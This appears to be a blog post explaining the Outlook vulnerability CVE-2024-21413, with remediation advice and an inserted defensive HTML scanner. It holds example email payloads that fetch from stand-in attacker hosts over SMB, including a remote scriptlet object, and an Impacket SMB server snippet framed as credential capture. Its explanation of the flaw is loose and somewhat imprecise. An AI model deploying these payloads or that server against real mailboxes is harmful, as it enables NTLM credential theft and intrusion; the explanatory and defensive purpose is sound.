CVE-2024-21413 - Breaking Down the New Microsoft Outlook Remote Code Execution Vulnerability

---

In early 2024, a major security flaw was uncovered in Microsoft Outlook, tracked as CVE-2024-21413. This vulnerability allows an attacker to execute code on your computer simply by sending you a specially crafted email. In this post, we'll unpack how the flaw works, what the risks are, what the exploit looks like in code, and what you can do right now to stay safe.

What Exactly is CVE-2024-21413?

CVE-2024-21413 is a Remote Code Execution (RCE) vulnerability affecting Microsoft Outlook on Windows. If an attacker sends you a malicious email and you preview or open it, the attacker's code could run on your computer. No clicking on suspicious attachments or links is required: just previewing the email can be enough.

Outlook for Microsoft 365

*For full details, check the official Microsoft advisory here: Microsoft Security Guide*

How Does the Exploit Work?

This vulnerability arises because Outlook improperly handles certain malicious links inside emails. By crafting a special type of *UNC path* (a Windows network path of the form \\server\share), attackers can trick Outlook into opening a dangerous file or triggering a payload, even from the preview pane.

Usually, Microsoft Outlook blocks dangerous links that might point to malicious network locations. In this case, however, it fails to block certain special URL schemes properly. This allows WebDAV or SMB requests to your internal resources, leaking NTLM hashes, or worse, downloading and running malicious scripts.

1. Email is crafted: The attacker embeds a UNC path in the message body, for example:

\\malicious-attacker.com\share\evil.html

2. Email is delivered: You don't even need to click anything; just viewing it in the preview pane is enough.

3. Code executed: Outlook tries to fetch the resource and, depending on the payload, code runs on your machine.

<html>
<body>
<!-- Image loads from attacker's SMB server -->
<img src="\\attacker-server\share\payload.png" />
</body>
</html>

If someone previews this message in Outlook, it attempts to access the attacker's SMB share, possibly giving away Windows credentials or running additional code.

Attackers can also use an htmlfile or scriptlet handler to execute scripts:

<html>
<body>
<!-- ActiveX used to run script without user consent -->
<object data="\\attacker.com\file.sct" type="text/x-scriptlet"></object>
</body>
</html>

Or a file:// reference, where a local path is needed.

Exploit in Python (For Demonstration Only)

Attackers can capture credentials using a basic SMB server like Impacket’s smbserver.py:

from impacket import smbserver

def start_smb_server():
    server = smbserver.SimpleSMBServer(listenAddress='...', listenPort=445)
    server.addShare('SHARE', '/tmp/payload', '')
    server.start()

if __name__ == "__main__":
    start_smb_server()

*When the target Outlook client loads the malicious email, it connects to this server and offers up Windows credentials automatically.*

- Bypasses Previous Protections: Outlook's usual link filters can be bypassed with this trick.

- Could Lead to Further Attacks: Exposed credentials or code execution let an attacker roam your network.

1. Patch Outlook Immediately: Microsoft released a fix in the February 2024 Patch Tuesday update.
   Direct patch instructions here
2. Disable automatic image loading: Set Outlook to not automatically download pictures or files.
3. Block outgoing SMB traffic: Preventing SMB traffic from workstations to the internet is a good safety measure.
4. Monitor for suspicious activity: Watch your logs for odd SMB or WebDAV requests to external servers.
5. Educate users: Let your team know not to open suspicious emails, though this exploit can act even without that step.
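One way to act on steps 3 and 4 at the mail gateway, as an added example that is not part of the original post: parse an HTML body and flag the \\host\share, file:// and text/x-scriptlet references described above, separating internal shares from external hosts. The scanner class, the internal_hosts list and the sample message are constructed for this illustration.

```python
import re
from html.parser import HTMLParser

URL_ATTRS = ("src", "data", "href", "background")  # attributes a mail client may resolve
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")                # \\host\share\...
FILE_RE = re.compile(r"^file://([^/\\]*)", re.IGNORECASE)  # file://host/... ('' host = local)

class UncReferenceScanner(HTMLParser):
    def __init__(self, internal_hosts=()):
        super().__init__()
        self.internal_hosts = {h.lower() for h in internal_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser decodes entities in attribute values, so "&#92;&#92;host" is already "\\host" here.
        attrs = {k: (v or "").strip() for k, v in attrs}
        scriptlet = tag == "object" and attrs.get("type", "").lower() == "text/x-scriptlet"
        for name in URL_ATTRS:
            if name not in attrs:
                continue
            match = UNC_RE.match(attrs[name]) or FILE_RE.match(attrs[name])
            if not match and not scriptlet:
                continue
            host = match.group(1).lower() if match else ""
            self.findings.append({
                "tag": tag, "attr": name, "value": attrs[name], "host": host,
                # an empty host means a local file:/// path, not a network fetch
                "external": bool(host) and host not in self.internal_hosts,
                "scriptlet": scriptlet,
            })

def scan_email_html(body, internal_hosts=()):
    """Return one finding per UNC / file: / scriptlet reference in an HTML body."""
    scanner = UncReferenceScanner(internal_hosts)
    scanner.feed(body)
    scanner.close()
    return scanner.findings

def should_quarantine(findings):
    """True if any reference leaves the trusted host list or uses a scriptlet."""
    return any(f["external"] or f["scriptlet"] for f in findings)

# Constructed sample: the post's two snippets plus a benign CDN image and an internal share.
SAMPLE_BODY = r"""<html><body>
<img src="https://cdn.example.net/logo.png">
<img src="\\attacker-server\share\payload.png">
<object data="\\attacker.com\file.sct" type="text/x-scriptlet"></object>
<a href="file://fileserver.corp.local/docs/report.docx">report</a>
</body></html>"""
```

Run `scan_email_html(SAMPLE_BODY, internal_hosts=["fileserver.corp.local"])` to get three findings, of which the two attacker hosts are marked external and the object is marked as a scriptlet.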

References for Deep Dive

- Microsoft Official CVE Advisory
- Huntress Labs blog breakdown
- ZDI’s Zero Day Initiative write-up

For technical readers, a detailed discussion thread can be found here:
Reddit NetSec Thread

The Takeaway

CVE-2024-21413 is a stark reminder that even trusted software like Outlook can have critical vulnerabilities. Stay ahead by patching fast, updating security policies, and keeping your users alert.

If you’re a system admin, audit your organization now. If you’re an everyday Outlook user, update your app ASAP and don’t ever ignore those “Update Available” reminders. In cybersecurity, the simplest steps often make the biggest difference.

Timeline

Published on: 02/13/2024 18:16:00 UTC
Last modified on: 02/15/2024 04:15:07 UTC